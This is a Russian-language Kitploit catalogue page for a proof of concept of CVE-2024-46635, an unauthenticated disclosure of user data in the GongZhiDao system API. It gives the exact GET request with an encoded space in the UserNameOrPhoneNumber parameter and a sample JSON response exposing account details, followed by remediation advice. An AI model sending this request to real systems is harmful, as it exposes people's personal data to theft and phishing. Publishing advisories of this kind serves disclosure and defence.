Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46635 — Доказательство концепции для CVE-2024-46635: уязвимость некорректной проверки входных данных в API-эндпоинте системы GongZhiDao, которая раскрывает конфиденциальную информацию пользователей без аутентификации. | Kitploit
Инструменты/GitHubGitHub/h1thub/cve-2024-46635
Анализ уязвимостейСбор информацииВеб-безопасностьТестирование на ПроникновениеНеправильная КонфигурацияБезопасность API
GitHubh1thub/cve-2024-46635

CVE-2024-46635

Доказательство концепции для CVE-2024-46635: уязвимость некорректной проверки входных данных в API-эндпоинте системы GongZhiDao, которая раскрывает конфиденциальную информацию пользователей без аутентификации.

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-46635

Предыстория

Система GongZhiDao — это платформа, разработанная компанией GongZhiDao. Она предоставляет корпоративные решения, включая управление пользователями, анализ данных и операционные функции. Однако в одной из конечных точек API была обнаружена уязвимость, которая потенциально может привести к раскрытию конфиденциальной информации пользователей без надлежащей авторизации.

Описание уязвимости

Уязвимость существует в конечной точке API /oaa/api/AccountMaster/GetCurrentUserInfo системы GongZhiDao. При передаче %20 (пробел в URL-кодировке) вместо параметра UserNameOrPhoneNumber API отвечает конфиденциальной информацией о пользователе, включая идентификатор учётной записи, имя пользователя и адрес электронной почты, даже без надлежащей аутентификации или авторизации. Такая некорректная проверка входных данных позволяет злоумышленникам получить несанкционированный доступ к конфиденциальным данным.

Воздействие

Успешная эксплуатация этой уязвимости может привести к раскрытию конфиденциальных данных пользователей, включая:

  • Идентификатор учётной записи
  • Имя пользователя
  • Адрес электронной почты
  • Номер телефона (при наличии)
  • Иную личную информацию
  • Злоумышленник может использовать эту информацию для проведения дальнейших атак, таких как кража личности или фишинг.

    Вектор атаки

    Чтобы воспользоваться уязвимостью, злоумышленник должен отправить специально сформированный HTTP GET-запрос к уязвимой конечной точке API:

    root@kitploit:~
    GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
    

    Этот запрос возвращает ответ 200 OK с конфиденциальными данными пользователя в формате JSON:

    root@kitploit:~
    HTTP/2 200 OK
    Date: Tue, 10 Sep 2024 03:25:09 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    Server: nginx/1.22.0
    X-Powered-By: ASP.NET
    Set-Cookie: Path=/; HttpOnly; Secure
    
    {"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}
    

    Технические детали

    • Затронутая конечная точка: /oaa/api/AccountMaster/GetCurrentUserInfo
    • Метод: HTTP GET
    • Параметры: UserNameOrPhoneNumber со значением %20
    • Ответ: API возвращает конфиденциальные данные пользователя в формате JSON без надлежащей проверки входных данных или авторизации.
    • Тип уязвимости: Некорректная проверка входных данных / Раскрытие конфиденциальной информации

    Рекомендации по устранению

    1. Внедрите надлежащую проверку входных данных: Убедитесь, что параметр UserNameOrPhoneNumber должным образом очищается и проверяется. Такие входные значения, как %20, должны отклоняться.

    2. Проверка авторизации: Внедрите надлежащие механизмы авторизации, чтобы гарантировать, что только аутентифицированные и авторизованные пользователи могут получать доступ к конфиденциальной информации.

    3. Ограничение частоты запросов и мониторинг: Примените ограничение частоты запросов к конечным точкам API для предотвращения атак методом перебора или автоматизированных атак, а также контролируйте активность API на предмет аномальных паттернов доступа.

    Авторы

    Эта уязвимость была обнаружена hithub.

    Ссылки

    • CWE-20: Некорректная проверка входных данных
    Скачать инструмент